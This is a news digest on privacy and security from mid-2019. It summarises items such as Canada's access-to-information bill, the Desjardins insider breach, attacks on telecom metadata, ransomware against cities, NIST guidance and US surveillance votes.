Federal cabinet ministers were patting themselves on the back last week after Bill C-58 received royal assent [Legislative Summary & text]. The bill updates Ottawa’s oft-criticized access-to-information regime, which the Liberals had promised during the last election to strengthen. On June 21 Democratic Institutions Minister Karina Gould claimed: “The changes announced today enhance the transparency and accountability of Canadian democratic institutions by ensuring that Canadians can easily view the most often requested documents without having to file an access to information request.” The bill faced heavy criticism during the two years it took to wend its way through Parliament. One of the beefs was that the Liberals did not fulfil their promise to expand the act to include ministers’ offices. The government said it needed to balance transparency with parliamentary privilege. Largely overlooked was a section of the bill ordering the regular release of information about expenses incurred and contracts signed by senior government officials, members of Parliament, senators, ministers and federal judges. It also requires the disclosure of certain briefing notes for ministers and deputy ministers. So is it true that the changes to the access-to-information regime introduced by the Liberals ensure Canadians can easily view the most requested documents without having to file an access to information request? Gould’s remark earns a rating of “some baloney” by the Canadian Press Baloney Meter and here’s why: Thanks to Bill C-58, parliamentarians and the federal government will begin releasing more information to Canadians — some that is regularly requested through the access-to-information system and some that was never previously covered by the law. Yet aside from uncertainty about how often such information is requested, experts say the long timelines under which documents will be produced and the lack of oversight of the process raise questions about Gould’s statement. According to Sean Holman, an expert on open government at Mount Royal University in Calgary: “It’s not completely full of baloney, but it’s excluding so much information. It’s saying that this one change is going to enhance transparency and accountability. And it’s saying that (people) can easily view them. And those aren’t actually true statements. They’re very seriously shaded truth.” And Teresa Scassa, a Canada research chair in information law at the University of Ottawa, says: “I think there’s going to be more that’s available through proactive disclosure eventually. But these are cautious steps and it’s a matter of how it’s going to play out, how much will actually be made available and under what circumstances.” For those reasons, Gould’s statement is deemed to contain “some baloney.” [CTV News]

Genetics

US – DNA-Testing Companies Form Coalition for Genetic Data Protection

Ancestry, 23andMe and Helix announced they have formed the Coalition for Genetic Data Protection. Mehlman Castagnetti Rosen & Thomas Principal and Coalition Executive Director Steve Haro said the group’s goal is to educate the U.S. Congress on industry best practices and build trust with customers of the genetic-testing companies. “As the legislative interest has risen this year on both the federal and the state level, we all found ourselves getting questions from legislators and staffers,” 23andMe Chief Legal and Regulatory Officer Kathy Hibbs said. “We’re forming the coalition in order to provide interested legislators as well as the public and press with a single voice on these issues because we do agree on the importance of these issues.” Hibbs added any company that joins the coalition must follow the group’s best practices. [The Hill]

Health / Medical

EU – Dutch DPA Offers Recommendations for DPOs in Health Care Organizations

A study conducted by the Dutch data protection authority, Autoriteit Persoonsgegevens, found data protection officers function well within health care organizations. In response to the findings of the 11 hospitals analyzed, AP Board Member Monique Verdier said a DPO within a hospital can identify how well the organization has complied with privacy laws, which is beneficial to the agency. The AP offered recommendations for both board members and DPOs to help the latter in their position. The agency recommends board members should detail the DPO’s role within an internal privacy policy, while it advises DPOs to maintain a strong balance between their advisory and supervisory roles. [Source]

Horror Stories

CA – Desjardins Says PI of 2.9 Million Members Shared Illegally by Employee

Desjardins, Canada’s largest credit union, says that it has suffered a data security breach. An employee, who has since been fired, stole customer information from a Desjardins database and shared it with people outside the financial institution. The breach affected information belonging to 2.9 million members. The compromised data include names, social insurance numbers, email addresses, and details of banking habits. Desjardins has changed the procedure for authenticating customers’ identities so that the stolen information cannot be used for that purpose. [montrealgazette.com: Desjardins: Rogue employee caused data breach for 2.9 million members | www.cbc.ca: Personal data of 2.7 million people leaked from Desjardins | www.zdnet.com: Desjardins, Canada’s largest credit union, announces security breach | www.desjardins.com: Important message for our members – June 20, 2019 – 2:00 pm | Desjardins says personal info of 2.9 million members shared illegally by employee | The Many Costs of a Rogue Employee: Are Punitive Damages One of Them?

WW – Phone Carrier Metadata Theft Likely the Work of Chinese Hackers

Researchers from Cybereason say that hackers that appear to be based in China have stolen metadata from at least 10 mobile phone service providers. The attack appears to be highly targeted; at one of the breached carriers, the hackers stole data related to just 20 specific individuals. The affected providers targeted in the attacks include companies in Asia, Africa, the Middle East, and Europe, but not North America. [www.wired.com: A Likely Chinese Hacker Crew Targeted 10 Phone Carriers to Steal Metadata | www.wsj.com: Global Telecom Carriers Attacked by Suspected Chinese Hackers (paywall) | www.cyberscoop.com: Chinese spies have been sucking up call records at multinational telecoms, researchers say | Personal data of 2.7 million people leaked from Desjardins ]

US – Former Equifax Exec Gets Prison Sentence for Insider Trading

A former Equifax executive has been sentenced to four months in prison for insider trading related to his knowledge of the company’s 2017 data breach prior to its public disclosure. Jun Ying sold his Equifax stock for a gain of $480,000, avoiding a loss of $117,000. He has been ordered to pay $117,000 in restitution and $55,000 in fines. Ying is the second Equifax employee to be sentenced to insider trading stemming from the breach. [www.govinfosecurity.com: Ex-Equifax CIO Gets 4-Month Prison Term for Insider Trading]

US – Minnesota Police Officer Awarded $585,000 in Data Privacy Violation Case

A jury has awarded a Minneapolis, Minnesota police officer US $585,000 in a case involving violations of the state’s Driver’s Privacy Protection Act. In 2013, Amy Krekelberg learned that her DMV records had been accessed nearly 1,000 times over a 10-year period. Krekelberg, who was never under investigation, sued the city and two police officers who had accessed her information. Minneapolis city attorney Susan L. Segal said that in the past, officers had been encouraged to learn how the DMV database worked by looking up friends and family members. The rules have since changed and officers are now required to enter a reason for searching DMV records. [www.wired.com: Minnesota Cop Awarded $585K After Colleagues Snooped on Her DMV Data]

Identity Issues

UK – Adult Website Age-Verification System Delayed Six Months

U.K. Secretary of State for Digital, Culture, Media and Sport Jeremy Wright announced the country’s age-verification system for online pornography will be delayed for six months. The policy, which was slated to go into effect July 15, would require users to prove they are over the age of 18 in order to access websites with adult content. Wright said the delay was a result of the U.K.’s failure to comply with European law on passing statutory instruments. “In autumn last year, we laid three instruments before the house,” Wright said. “One of them sets out standards that companies need to comply with. This should have been notified to the European commission, and it was not. This will result in a delay in the region of six months.” [The Guardian]

US – Massive Data Breaches Undermine Reliability of Online Identity Verification

A report from the U.S. Government Accountability Office (GAO) says that large data breaches like the 2015 breach at the Office of Personnel Management and the 2017 Equifax breach have undermined online identity authentication processes. Prior to the Equifax breach, federal agencies used consumer reporting agencies (CRAs) to verify users’ identities. Now that so much information has been compromised, the method is no longer reliable. GAO conducted the study because it “was asked to review federal agencies’ remote identity proofing practices in light of the recent Equifax breach and the potential for fraud.” While 2017 guidance from the National Institute of Standards and Technology (NIST) basically prohibits agencies from using knowledge-based verification schemes for “sensitive applications,” some agencies have not moved away from knowledge-based identity verification, noting that barriers include costs “and implementation challenges for certain segments of the public.” [fcw.com: Your personal data is too public for agencies to verify | www.zdnet.com: Equifax breach impacted the online ID verification process at many US govt agencies | www.gao.gov: Federal Agencies Need to Strengthen Online Identity Verification Processes (PDF) | pages.nist.gov: NIST Special Publication 800-63A: Digital Identity Guidelines (2017)]

Internet / WWW

UK – ICO Admits Its Own Website Fails to Comply With GDPR

The ICO has been forced to own up to the fact that its current consent notice relating to the use of cookies on mobile devices failed “to meet the required GDPR standard”. This confession came after Adam Rose, a lawyer at Mishcon de Reya, discovered the privacy screw-up, which saw the ICO relying on “implied consent” to automatically place cookies on mobile devices when visitors accessed its website. Rose argued that this is was a breach of Article 6 of the Privacy and Electronic Communications Regulations (PECR) 2003. PECR – which sits alongside GDPR – prohibits the storage of, or access to, information held on a user’s device unless explicit consent is given. This is even explained clearly on the ICO’s website, where the watchdog warns companies that: “You must tell people if you set cookies, and clearly explain what the cookies do and why. You must also get the user’s consent. Consent must be actively and clearly given.” Rose argued that because of the ICO’s use of implied consent, which saw cookies used automatically, users were unable to reject their use. In an email sent to Rose, the ICO confessed: “I acknowledge that the current cookies consent notice on our website doesn’t meet the required GDPR standard.” [The Inquirer] | UK data regulator admits its own website does not conform to GDPR | Data Notes: Cookie Compliance: How can companies get it right when the regulator does not?]

WW – IAB Launches Programs with New Data Transparency Standard

IAB Tech Lab has released new systems aimed at creating more transparency with third-party data. IAB is rolling out a new standardization system for the data while also implementing auditing and credentialing programs for those selling data. The information includes specific dates of user ID collections, URLs, location data and indications on whether lookalike modeling is included in a segment. “We’re hopeful publishers will adopt it to describe their first-party data as well,” IAB Tech Lab General Manager Dennis Buchheim said. “Because in some ways they are the key here as both data sellers and data buyers.” Buchheim added there’s potential for the addition of consent information to the standard in the future. [AdExchanger]

Law Enforcement

US – Supreme Court Allows Warrantless Blood Draws of Unconscious Drivers

The U.S. Supreme Court ruled that exigent circumstances allow police to draw blood from an unconscious driver without his permission and without a warrant if the police suspect that the driver is under the influence of alcohol. Today’s decision in Mitchell v. Wisconsin comes just three years after the Court ruled that police generally do need to get a warrant to perform blood tests if a driver does not voluntarily consent. And the Court’s judgment actually dodged the major question presented by the case: Whether a state can force a citizen to consent in advance to unwarranted blood tests as a condition of driving. [Reason]

Location

US – Ad Groups Prep Companies on Location Data Use Ahead of CCPA

The Mobile Marketing Association and the Network Advertising Initiative have worked to prepare companies for sharing consumer location data ahead of the California Consumer Privacy Act. The groups have advised companies to be more transparent about how the online ad industry monetizes location data. The MMA has raised funds to establish the Location Privacy Alliance in hopes of creating self-regulatory guidelines for companies that have business models centered on such information. The NAI has asked its own members to raise the age of consent of addressable audiences from 13 to 16 as it plans to implement a new Code of Conduct next year. [Adweek]

Online Privacy

UK – ICO Publishes Report on Adtech, RTB

The U.K. Information Commissioner’s Office published an updated report on its research into advertising technology and real-time bidding. The agency focused on the processing of special data categories, data protection impact assessments and transparency. The ICO found the adtech industry to be “immature in its understanding of data protection requirements. Whilst the automated delivery of ad impressions is here to stay, we have general, systemic concerns around the level of compliance of RTB.” The report also outlined the ICO’s next steps to better understand adtech and RTB. Meanwhile, publisher group DCN wrote in a letter to European regulators “the sky won’t fall” if RTB were to switch to non-personal data. [ICO.org.uk]

US – FTC Asked to Investigate Practice of ‘Surveillance Scoring’

Nonprofit group Consumer Education Foundation has filed a petition with the U.S. Federal Trade Commission asking the agency to explore if the use of surveillance scores constitutes “unfair or deceptive practices” under the FTC Act. The petition identifies dozens of U.S. businesses known to use surveillance scores and 11 U.S.-based firms that provide the scores, as well as describing how as many as 121 analytics companies “categorize, grade, or assign a numerical value to a consumer based on the consumer’s estimated predicted behavior.” The foundation claims the data gathered from the scores is kept hidden with no option to appeal. [Gizmodo]

WW – Privacy Risks in Social Media Groups

Millions of people use social media platforms to seek health advice and support. However, social media platforms avoid federal health privacy laws as long as they don’t offer medical services, which puts the onus on online group moderators to follow platform rules on privacy and redact sensitive information before posting. In the event a third party leaks the user’s personal information, the moderator might be held responsible before the social media platform. “The Health Insurance Portability and Accountability Act applies to healthcare providers, healthcare plans and clearinghouses, not to any random company that collects data about your physical or mental health,” said Georgetown Law Communications and Technology Clinic Staff Attorney and Teaching Fellow Lindsey Barrett. [Bloomberg Law]

WW – Study Reveals How Websites Deploy ‘Dark Patterns’ to Online Users

A Princeton University study explores the prevalent use of “dark patterns” to manipulate the decisions of online consumers. Researchers examined more than 10,000 sites and found that more than 1,200 used the patterns, including ThredUp’s fake notifications, among other misleading tactics. Arunesh Mathur, Princeton doctoral student and one of the authors of the report, said the research had a limited scope as the study’s software only scanned retail sites, which leaves the possibility of dark patterns being used more frequently on other sites. The study comes months after members of the U.S. Senate proposed a bill to regulate the use of dark patterns by social media companies. France’s data protection authority also recently released a report on dark patterns. [New York Times]

Privacy (US)

US – FTC Launches Investigation into YouTube Over Alleged COPPA Violations

The U.S. Federal Trade Commission announced it has launched an investigation into YouTube for alleged violations of the Children’s Online Privacy Protection Act. The agency had received complaints from consumer groups and privacy advocates that claimed the platform improperly gathered young users’ data. “YouTube is a really high-profile target, and for obvious reasons because all of our kids are on it,” said Groman Consulting Principal Consultant Marc Groman. “But the issues on YouTube that we’re all grappling with are elsewhere and everywhere.” YouTube Spokeswoman Andrea Faville did not comment on the FTC investigation; however, she said while some of the ideas to improve the platform are not developed, others “like our restrictions to minors live-streaming or updated hate speech policy” have been created and launched. [Wash Post] | Claims YouTube Illegally Tracked Kids Reportedly Spark Federal Investigation | YouTube under federal investigation over allegations it violates children’s privacy | YouTube Weighs Major Changes to Kids’ Content Amid FTC Probe ]

US – FTC, Justice Dept. Takes Coordinated Action Against Robocallers

Federal authorities have announced its latest crackdown on illegal robocallers — taking close to a hundred actions against several companies and individuals blamed for the recent barrage of spam calls. In the so-called “Operation Call It Quits,” the Federal Trade Commission brought four cases — two filed on its behalf by the Justice Department — and three settlements in cases said to be responsible for making more than a billion illegal robocalls [read detailed FTC PR]. Several state and local authorities also brought actions as part of the operation, officials said. Each year, billions of automatically dialed or spoofed phone calls trick millions into picking up the phone. An annoyance at least, at worse it tricks unsuspecting victims into turning over cash or buying fake or misleading products. So far, the FTC has fined companies more than $200 million but only collected less than 0.01% of the fines because of the agency’s limited enforcement powers. In this new wave of action, the FTC said it will send a strong signal to the robocalling industry. It’s the second time the FTC has acted in as many months. In May, the agency also took action against four companies accused of making “billions” of robocalls [read detailed FTC PR here]. The FTC said its latest action brings the number of robocall violators up to 145. Several of the cases involved shuttering operations that offer consumers “bogus” credit card interest rate reduction services, which the FTC said specifically targeted seniors. Other cases involved the use of illegal robocalls to promote money-making schemes. Another cases included actions against Lifewatch, a company pitching medical alert systems, which the FTC contended uses spoofed caller ID information to trick victims into picking up the phone. The company settled for $25.3 million. The robocalling epidemic has caught the attention of the Federal Communications Commission, which regulates the telecoms and internet industries. Last month, its commissioners proposed a new rule that would make it easier for carriers to block robocalls. [TechCrunch | FTC crackdown targets operators behind 1 billion robocalls]

US – Sen. Merkley Wants Collection Methods for Driver Data to be Revealed

U.S. Sen. Jeff Merkley, D-Ore., has sent a letter to 13 car manufacturers calling for more transparency regarding the collection of driver data. Merkley is seeking clarity on whether or not the companies are collecting data, and if so, he wants to know details on the type of data, ownership and storage. “While data plays an integral role in advancing new technology to maximize consumer benefits and bolster the American automotive industry, it is necessary to understand the scope, purpose, and extent to which our cars collect data,” Merkley wrote. “It is understandable that this data is used to improve performance and safety, though it may be unclear to many consumers what level of ownership they have over the data collected by the car they own or are leasing.” Merkley is hoping for a response from companies within 30 days. [Merkley.senate.gov]

US – EFF Reveals Top Priorities for Consumer Data Privacy Laws

The Electronic Frontier Foundation revealed its three top priorities that should be included in proposed data privacy legislation. The first priority is to avoid federal preemption legislation that overrides stronger state privacy laws. The second priority states legislation should empower consumers to file their own lawsuits against companies that violate their privacy rights. The remaining top priority includes incorporating nondiscrimination rules to avoid pay-for-privacy schemes — consumers who choose more private options should receive the same goods, prices and quality as those who do not opt in to privacy options. In addition to the top three priorities, EFF would like data privacy legislation to include the right to opt-in consent, the right to know, and the right to data portability. Conversely, EFF recommends against expanding the scope or penalties of computer crime laws, citing the existing laws are too broad. [EFF.org]

Privacy Enhancing Technologies (PETs)

WW – Sign In with Apple Aims to Protect Users from Tracking

Apple has introduced a new privacy feature called Sign In with Apple, which will use AppleIDs rather than email addresses to verify credentials. All developers that use third-party sign-ins will be required to offer it as an option to users if they offer other third-party sign-ins, like Google and Facebook. Users who want to adopt the feature will be required to add two-factor authentication to their AppleID accounts. The feature is currently in limited beta. [www.wired.com: ‘Sign In with Apple’ Protects You in Ways Google and Facebook Don’t | www.cnet.com: Sign In with Apple will come to every iPhone app: How the new privacy login tool works | threatpost.com: Is ‘Sign in with Apple’ Marketing Spin or Privacy Magic? Experts Weigh In]

WW – Google Releases Open-Source Tool to Assist In Secure Data Sharing

Google announced it has launched an open-source tool to help organizations share information and respect data subjects’ privacy rights. The Private Join and Compute multiparty computation uses a cryptographic protocol to allow parties to encrypt identifiers within datasets and join them together. The two groups can perform calculations of the data to find useful information in aggregate. “All inputs (identifiers and their associated data) remain fully encrypted and unreadable throughout the process,” the company wrote in a blog post. “Neither party ever reveals their raw data, but they can still answer the questions at hand using the output of the computation. This end result is the only thing that’s decrypted and shared in the form of aggregated statistics.” [Google Blog | www.wired.com: Google Turns to Retro Cryptography to Keep Data Sets Private | www.theregister.co.uk: Google takes the PIS out of advertising: New algo securely analyzes shared encrypted data sets without leaking contents | www.zdnet.com: Google open sources Private Join and Compute, a tool for sharing confidential data sets

WW – Google’s G-Suite Confidential Mode Will Soon Be Enabled by Default

Starting in June, Google will enable confidential mode by default in its G Suite. The feature prevents users from forwarding, copying, or printing messages, and allows senders to set an expiration dates for their messages. Confidential mode has been available in beta for several months. Admins will have the ability to disable the feature if they choose to. [duo.com: Google Turning On Confidential Mode by Default in G Suite | gsuiteupdates.googleblog.com: Gmail confidential mode launching on by default]

US – Carnegie Mellon U Seeks Sponsors for Privacy Engineering Projects

As part of its privacy engineering masters program, Carnegie Mellon University is seeking organizations that want to sponsor capstone projects in the fall. Small teams of students with technical backgrounds will work on the projects under the supervision of a faculty member beginning in August. Organizations are asked to specify a project of interest, a contact person to hold virtual weekly meetings with the team, and sponsorship funding. Students will produce a variety of deliverables, including a final report and presentation. Students from past projects have developed prototype software, industry practice surveys and feasibility studies. [CMU.edu]

RFID / IoT

US – NIST Issues Publication on IoT Security

The US National Institute of Standards and Technology (NIST) has published a paper that aims “to help federal agencies and other organizations better understand and manage the cybersecurity and privacy risks associated with their individual IoT devices throughout the devices’ lifecycles.” The paper, Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks, is the foundational publication for what will be a series of publications that offer more specific aspects of managing IoT security. [Need more evidence that IoT security is a big deal? Here’s what NIST has to say | NIST: Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks (abstract) | NIST: Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks]

Security

US – Ransomware Cases Becoming Public

More ransomware stories are becoming public.

  • Georgia: The Administrative Office of the Georgia Courts disclosed its systems were infected with ransomware. [Ars Technica | Wired]
  • Lake City FL: Officials in Lake City, Florida, have fired an IT employee after the city’s insurance paid nearly $500,000 in ransom to regain its data. [ZDnet] | NYTimes | SC Magazine | Cyberscoop | New York Times]
  • Baltimore: Officials have authorized US $10 million to pay for expenses from a ransomware attack that hit the city in May. The attackers asked for $80,000 but the city chose not to pay on the advice of law enforcement. [SC Magazine]

Read more:

  • zdnet.com: Ransomware attacks: Why and when it makes sense to pay the ransom
  • forrester.com: Unconventional Wisdom: Explore Paying The Ransom In Parallel With Other Recovery Options
  • washingtonpost.com: Hackers are taking cities hostage. Here’s a way around it.

US – Senate Issues Report on Federal Cybersecurity

A US Senate report examined the cyber security compliance of eight federal agencies as documented in 10 years’ worth of reports from their respective Inspectors General. The report investigated compliance at the Department of Homeland Security (DHS) as well as at seven agencies that the Office of Management and Budget (OMB) rated lowest on cybersecurity. The report concluded that “the federal government remains unprepared to confront the dynamic cyberthreats of today.” [www.theregister.co.uk: Stop us if you’ve heard this one: US government staff wildly oblivious to basic computer, info security safeguards | www.zdnet.com: Report shows failures at eight US agencies in following cyber-security protocols | www.cyberscoop.com: Senate investigation finds agencies ‘unprepared’ to protect Americans’ data | www.portman.senate.gov: Federal Cybersecurity: America’s Data at Risk]

US – NIST Updates SP 800-171 to Help Defend Sensitive Information

National Institute of Standards and Technology’s [NIST] information security document “Draft NIST Special Publication (SP) 800-171 Revision 2: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations” [see here] offers strategies to help protect sensitive information that is stored in computers supporting critical government programs and high value assets. It now has a companion document “NIST SP 800-171B: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations: Enhanced Security Requirements for Critical Programs and High Value Assets” [see here] with additional recommendations for handling Controlled Unclassified Information [CUI] in situations where that information runs a higher than usual risk of exposure. It does not alter the original guidance but simply provide additional tools to help deal with what are considered “advanced persistent threats” — those adversaries who possess the expertise and resources to play the long game of cyber warfare. They often attempt to establish long-term footholds within a target’s infrastructure to steal information or undermine critical aspects of its mission, sometimes years after the initial breach. NIST is accepting comments on both SP 800-171 Rev. 2, which received minor editorial updates, and SP 800-171B until July 19, 2019. In addition, a previously available companion document, “NIST SP 800-171A: Assessing Security Requirements for Controlled Unclassified Information” [see here], will be updated with new assessment procedures for the enhanced security requirements. The requirements in SP 800-171B are largely drawn from two other draft publications, NIST SP 800-160 Vol. 2 [here] and NIST SP 800-53 Rev. 5 [here & 494 pg PDF], both of which NIST is developing to help engineer security into information systems. Recognizing that many contractors do not have the in-house resources to implement the requirements fully, the revised draft indicates how an organization might use appropriate third-party contractors to perform specific tasks such as evaluating an organization’s resiliency to cyberattack or providing a Security Operations Center capability. [News & Events (National Institute of Standards and Technology)]

US – Wyden to NIST: Publish Guidance for Secure Data Sharing

US Senator Ron Wyden (D-Oregon) wants the National Institute of Standards and Technology (NIST) to develop and publish guidance to help “individuals and organizations… securely share sensitive data over the Internet. Wyden notes that government agencies often send sensitive data in emailed .zip files and other unsecure methods. [www.cyberscoop.com: How secure is that .zip file? One senator is urging NIST to weigh in | www.theregister.co.uk: If Uncle Sam could quit using insecure .zip files to swap info across the ‘net, that would be great, says Silicon Ron Wyden | www.wyden.senate.gov: Letter to NIST Director]

US – NIST Releases Guidelines for Building Secure Software

The National Institute of Standards and technology has released a draft document, Mitigating the Risk of Software Vulnerabilities by Adopting a Secure Software Development Framework (SSDF), which “facilitates communications about secure software development practices amongst business owners, software developers, and cybersecurity professionals within an organization.” The framework involves principles for software preparation, protection, creation and vulnerability response. “Following these practices should help software producers reduce the number of vulnerabilities in released software, mitigate the potential impact of the exploitation of undetected or unaddressed vulnerabilities, and address the root causes of vulnerabilities to prevent future recurrences,” NIST wrote in the framework. “Software consumers can reuse and adapt the practices in their software acquisition processes.” The guidelines also feature a call for the creation of a bill of materials that will help expedite vulnerability patches. The framework will be open for public comment until Aug. 5. [www.nextgov.com: NIST Asks for Input on Building Secure Software | csrc.nist.gov: Mitigating the Risk of Software Vulnerabilities by Adopting a Secure Software Development Framework (SSDF)]

WW – Microsoft Will Require Multi-Factor Security for Cloud Solution Providers

Microsoft has updated its Partner Security Requirements. The company will require all Cloud Solution Providers (CSPs) that help organizations manage their Office365 accounts to use multi-factor authentication. When Office365 licenses are purchased from a reseller partner, that partner must have administrative privileges to help set it up. Customers have the option of removing that initial admin account after set-up. Some organizations use a CSP to get better pricing that they would if they purchased the licenses directly from Microsoft and they may not be aware that the CSP retains the administrative account. [docs.microsoft.com: Partner Security Requirements | krebsonsecurity.com: Microsoft to Require Multi-Factor Authentication for Cloud Solution Providers]

WW – Survey: Human Error Remains Top Cause of Data Breaches

In a Shred-it survey done by Ipsos, 53% of C-suite executives and 28% of small business owners cite human error or accidental loss by an outside party as the leading causes of data breaches. The survey also showed 47% of C-suites and 31% of SBOs believe the human error and accidental loss stem from someone within the affected organization. “For the second consecutive year, employee negligence and collaboration with external vendors [continue] to threaten the information security of U.S. businesses,” Stericycle Senior Vice President Ann Nickolas said. “The consequences of a data breach are extensive and are not limited to legal, financial and reputational damage.” Meanwhile, WatchGuard Technologies Senior Security Researcher Marc Laliberte wrote for Help Net Security on why businesses need to be up to date on how to spot and respond to phishing attacks. [Help Net Security]

US – Enterprises Won’t Act on Fears of Data Security, Lack Funds: Survey

An Ensighten survey of 200 marketing, security, information technology and corporate professionals showed staggering inconsistencies with concerns regarding data breaches versus action to prevention. Nearly 90% of respondents said the recent increase in breaches concerns them, and 98% would like to bolster security to avoid data exposures. However, only 34.5% have put their fears to rest by implementing safeguards for customer data. The lack of action toward bulking up data protection stems from insufficient funding, as 79% of respondents said their organization is given less than $500,000 annually to address security needs. [MarTech Advisor]

US – Years of Call Records Stolen from Cell Networks

Over the last seven years, hackers have attacked at least 10 cell networks in what security researchers are calling “massive-scale” espionage. Researchers at Boston-based Cybereason first discovered the attacks in 2018. The hackers have obtained vast amounts of call records on at least 20 targeted individuals, including dates, times and locations of the calls. Researchers found the hackers broke into cell providers, one after the other, in an attempt to obtain and download rolling records on the target, avoiding having to deploy malware on the target’s individual devices. As the attacks are ongoing, researchers will not publicly identify the cell networks or targeted individuals. [TechCrunch]

US – Traveler and License Plate Images Stolen from Customs and Border Protection Contractor’s Network

US Customs and Border Protection (CBP) has acknowledged that hackers broke into the IT systems of a third party contractor and stole photos of people and images of license plates. CBP uses cameras and video recordings at airports and at land border crossings. CBP said that it learned of the breach in late May; the contractor, who has not been identified, had copied the images to its own network, which was then breached. [www.wired.com: Hackers Stole a Border Agency Database of Traveler Photos
www.washingtonpost.com: U.S. Customs and Border Protection says photos of travelers were taken in a data breach | www.theregister.co.uk: US border cops confirm: Maker of America’s license-plate, driver recognition tech hacked, camera images swiped]

WW – Spam Campaign Exploits Known Flaw in Microsoft Office

Microsoft has warned of a spam campaign that uses maliciously-crafted RTF documents. Once the documents have been opened, they infect computers with no additional user interaction. The spam email is being sent in several different European languages. The malicious documents exploit a known vulnerability for which Microsoft released a patch in November 2017. [www.threatpost.com: Microsoft Warns of Email Attacks Executing Code Using an Old Bug | www.zdnet.com: Microsoft warns about email spam campaign abusing Office vulnerability | www.bleepingcomputer.com: Microsoft Issues Warning on Spam Campaign Using Office Exploits | www.microsoft.com: CVE-2017-11882 | Microsoft Office Memory Corruption Vulnerability]

WW – Google Announces Fix for Bug Used in Nest Cameras

Google has fixed an issue that allowed previous owners of Nest security cameras to continue to view a feed from the device, even after deregistering it from their account and without the new owner’s knowledge. The issue affects Nest cameras connected to third-party partner services via Works with Nest. Last month, Google announced it was discontinuing the Works with Nest program in an effort to prevent third-party devices from accessing data captured by Nest devices. The fix updates devices automatically. This is the second privacy issue to hit Google’s Nest division this year. In February, the company did not disclose the Nest Secure home security system included an on-device microphone. [The Verge]

WW – Privacy and Consent Updates for Adobe Cloud

Crownpeak has revealed a new extension for Launch, Adobe’s Cloud Platform tag-management facility, to help marketers simplify compliance with global privacy laws. The extension allows users of Crownpeak’s Universal Consent Platform to integrate with the Adobe Cloud platform and ensure they are complying with global privacy laws. Marketers will be able to add prebuilt banners to websites that give users control over privacy settings. In addition to the new Launch extension, the Universal Consent Platform now includes real-time scanning, which provides up-to-date data collected from site visitors. [Yahoo Finance]

Smart Cities

CA – Sidewalk Labs Makes Data Privacy Commitment in Toronto Smart-City Plan

Following ongoing backlash from privacy advocates, Sidewalk Labs has confirmed it will not sell advertisers the personal data collected from its Sidewalk Toronto smart-city project. Sidewalk, a subsidiary of Alphabet, showed its new pledge to data privacy in its master plan for Sidewalk Toronto that was released Monday. In addition to refraining from selling personal data, Sidewalk CEO Dan Doctoroff said his company will not disclose personal information to third parties without explicit consent. The project has been scrutinized for its use of sensors, which critics believe opens the door for improper data collection and heightened surveillance. [Reuters | Sidewalk Labs unveils $1.3-billion plan for Toronto’s waterfront, revealing a vision much larger than initially proposed |Sidewalk Labs decision to offload tough decisions on privacy to third party is wrong, says its former consultant | Google’s Sidewalk’s bet is a nightmare for the privacy conscious | Sidewalk Labs’ proposed plan for Toronto’s waterfront: Everything you need to know | Sidewalk Labs could make Toronto a world leader in urban tech | Five potential sticking points in Sidewalk Labs’ masterplan for the Toronto waterfront | Did Sidewalk Labs’ overstep with their masterplan? It certainly raised concerns at Waterfront Toronto | In ethics report, NDP calls on Ottawa to halt Sidewalk Labs commitments pending further consultations | Ann Cavoukian still has problems with Sidewalk Labs’ approach to data with Quayside

Surveillance

US – House Votes Against Curtailing Warrantless Collection of Americans’ Data

Due to opposition from national security hawks the US House voted 175-253 [see roll call of votes here] against the amendment introduced by two pro-privacy lawmakers Reps. Justin Amash [R-Mich. here] and Zoe Lofgren [D-Calif. here] that would have curtailed a controversial law … Section 702 of the Foreign Intelligence Surveillance Act (FISA) [see 4 pg PDF overview here also EFF here & BCFJ here] that allows the U.S. government to collect communications from foreigners located outside of the U.S. In April 2019, the Office of the Director of National Intelligence said U.S. intelligence agencies conducted 9,637 queries for search terms concerning a U.S. person in 2018. The Amash and Lofgren amendment [read 1 pg PDF here] would have barred the government from collecting communications under FISA on Americans without a warrant. They tried to pass the measure as part of an appropriations bill [H.R. 2740 see here] that funds several federal departments, including the Labor Department, Department of Health and Human Services and the Department of Defense. Forty-two civil society groups signed onto an impromptu letter in support of the Amash-Lofgren amendment, writing it would “significantly advance the privacy rights of people within the Unties States.” : “We just got handed a potentially historic opportunity to finally finally close the gaping loopholes in Section 702 of the FISA Amendments Act that the National Security Agency abuses to conduct warrantless dragnet surveillance of our Internet activity, email, text messages, etc,” [read here] [After the vote it] pointed out that more Democrats had voted against the amendment than Republicans: “It’s good to know that House Democrats like Adam Schiff are ‘resisting’ Trump by voting to ensure that he has limitless authority to conduct mass warrantless surveillance” [read PR here] Deputy director Evan Greer said: “The Democrats who voted against this common sense amendment just threw immigrants, LGBTQ folks, activists, journalists, and political dissidents under the bus.” Amash on the House floor earlier on Tuesday said Republican and Democrats’ resistance to reforming Section 702 exemplifies “what’s wrong with Washington.” [watch here] Congress last year reauthorized Section 702 of FISA with few alterations after a bitter battle between privacy activists and security hawks in both chambers. [The Hill | House Votes Down Amash’s Attempt To Stop Warrantless FISA Surveillance | House votes down amendment to ban warrantless spying on Americans | Critics Lament as 126 House Democrats Join Forces With GOP to Hand Trump ‘Terrifying’ Mass Domestic Spying Powers

WW – Study: Monitoring Patient Social Media Accounts for Evidence of Disease

A new study from a group of researchers at the University of Pennsylvania Perelman School of Medicine found social media data outperformed demographic data in predicting diseases, such as diabetes, anxiety and depression. The study’s authors believe doctors could better diagnose and treat diseases if they had access to a patient’s social media accounts. The study analyzed the social media accounts of nearly 1,000 patients with their consent. While researchers anonymized the individuals’ identity, privacy advocates are concerned about the risks of health care records in relation to social media data. “If health records and social media data start to become more routinely linked, the privacy risks could be far more significant,” Open Rights Group Legal Officer Amy Shepherd said. [Vice.com]

UK – Civil Rights Group Challenge UK Government’s Data Surveillance Practices

Liberty, a U.K. civil rights group, has made a claim to the High Court regarding the U.K. government’s alleged unlawful, broad use of the Investigatory Powers Act. The law allows the government to collect surveillance data from the majority of U.K. citizens, including individuals who are not suspected of any wrongdoing. Liberty alleges the IPA’s collection powers go against the European Convention on Human Rights. “These powers permit the interception or obtaining, processing, retention and examination of the private information of very large numbers of people — in some cases, the whole population,” Liberty Barrister Martin Chamberlain said. Government lawyers are prepared to argue that their methods do not pose a risk of an invasion of privacy based on the limited use of the data. [BBC News]

